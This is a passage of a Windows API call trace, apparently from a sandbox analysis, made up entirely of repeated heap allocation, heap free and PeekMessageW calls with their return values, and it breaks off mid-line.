[0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d78 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01978 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.561] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.561] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019a8 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.561] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.561] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc019c8 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.562] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.562] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.562] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.562] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.562] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.563] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.563] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.563] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.563] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.563] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.564] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.564] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.564] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.564] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.564] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.565] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.565] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.565] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.566] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.566] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.566] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.566] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.566] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.567] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.567] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.567] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.567] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.567] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: 